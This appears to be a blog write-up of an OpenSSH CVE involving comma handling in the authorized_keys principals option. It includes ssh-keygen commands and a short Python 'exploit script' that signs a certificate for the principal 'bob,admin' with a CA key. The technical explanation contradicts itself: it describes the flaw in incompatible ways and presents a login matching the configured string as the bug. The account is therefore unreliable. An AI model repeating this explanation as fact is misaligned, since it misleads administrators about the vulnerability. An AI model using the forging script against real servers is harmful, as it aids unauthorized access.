CVE-2026-35414 - Exploiting OpenSSH’s authorized_keys Principals Mishandling

CVE-2026-35414 is a newly disclosed vulnerability affecting OpenSSH versions prior to 10.3. This flaw opens the door to unexpected access due to the way OpenSSH mishandles the principals option in the authorized_keys file. The bug centers around uncommon setups: when the principals list is used alongside Certificate Authority (CA) keys that have principal names containing special characters like commas.

In this article, we’ll break down the vulnerability, provide technical examples, show possible exploitation, and share references for further exploration.

What is the principals Option in OpenSSH?

OpenSSH’s authorized_keys file lets you specify various options for incoming public keys. The principals option restricts which principal names a certificate must present for the authentication to succeed. Typically, people don’t often use this; but in larger setups where SSH certificate authentication is preferred, it’s common.

A simple line in authorized_keys might look like this

cert-authority,principals="bob,alice" ssh-rsa AAAAB3Nza...CA...

This means only certificates valid for "bob" or "alice" (according to the CA) can authenticate.

The Vulnerability: Mishandling Comma Characters

The problem arises when principal names themselves include commas — for example, bob,admin. Prior to 10.3, OpenSSH doesn’t correctly parse these cases, which can easily occur with custom CA software or during automation. As a result, certificates sometimes get granted access they shouldn’t, or are denied incorrectly.

The intention: Allow users with either bob or admin principal.

3. What actually happens: OpenSSH interprets the principals list as the single principal bob,admin and not as two separate principals. If the CA certificate actually grants the principal bob,admin (which is rare), access is granted.

If a certificate has principals like bob or admin (separately), it gets denied access even though it should be allowed.

Inversely, a poorly-constructed CA could accidentally assign bob,admin as a principal, which the server matches, even though the expectation was to allow either bob or admin separately.

In a real-world setup, an attacker could leverage this in the following ways

1. Bypassing Authorization: If an attacker can persuade a CA admin to issue a certificate with a principal string containing a comma ("bob,admin"), they could gain unauthorized access under conditions where only "bob" or "admin" should be allowed.
2. Denial of Legitimate Access: If legitimate users have principals "bob" and want access, but the authorized_keys configuration expects "bob,admin", their authentication fails, causing confusion and potentially locking users out.

Step 1: Generating a CA Key

ssh-keygen -t rsa -b 4096 -f ca_key

Step 2: Signing a User Key With a Comma Principal

ssh-keygen -s ca_key -I id_bob -n "bob,admin" id_rsa.pub

Here, -n specifies the certificate’s principals. We’re assigning a single principal with a comma in the string.

On the server, place this in /home/targetuser/.ssh/authorized_keys

cert-authority,principals="bob,admin" ssh-rsa AAAAB3... (CA public key)

*But*, if you login with a cert holding just the single principal "bob,admin", *it succeeds*.

This misalignment is the *core* of CVE-2026-35414.

Exploit Script Example (Python)

Here’s a snippet that can automate the forging of such a certificate for attack purposes if one possesses CA key access (or the CA is mismanaged):

import subprocess

def create_forged_cert(ca_key, user_pubkey, principle):
    subprocess.run([
        'ssh-keygen', '-s', ca_key, '-I', 'exploit_id',
        '-n', principle, user_pubkey
    ])

# Parameters
ca_key = 'ca_key'
user_pubkey = 'attacker_id_rsa.pub'
principal = 'bob,admin'

create_forged_cert(ca_key, user_pubkey, principal)

With this, an attacker (with limited CA privileges or through social engineering) could generate a certificate that would slip through misconfigured checks.

Fix and Mitigation

Upgrade OpenSSH to at least version 10.3, where this bug is fixed and parsing is corrected.

If you’re stuck on an older OpenSSH, do not use commas within principal names, and carefully audit all principal definitions to ensure they’re unambiguous.

References

- OpenSSH ChangeLog
- OpenSSH Certificate Authentication
- CERT Coordination Center on SSH Certificates

There isn’t an official NVD link yet for CVE-2026-35414 as it’s quite new. Stay up-to-date on cve.mitre.org.

Conclusion

CVE-2026-35414 underlines how subtle configuration and parsing bugs in security software like OpenSSH can have outsized impact when rare options or edge cases are in use. If your setup relies on OpenSSH with SSH certificate authentication and the principals restriction, review your keys and upgrade as soon as possible.

Timeline

Published on: 04/02/2026 17:08:15 UTC
Last modified on: 04/03/2026 19:39:03 UTC